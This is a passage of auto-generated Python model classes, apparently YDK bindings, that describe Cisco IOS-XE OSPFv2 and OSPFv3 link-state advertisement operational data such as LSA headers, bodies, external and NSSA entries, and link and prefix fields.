str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = 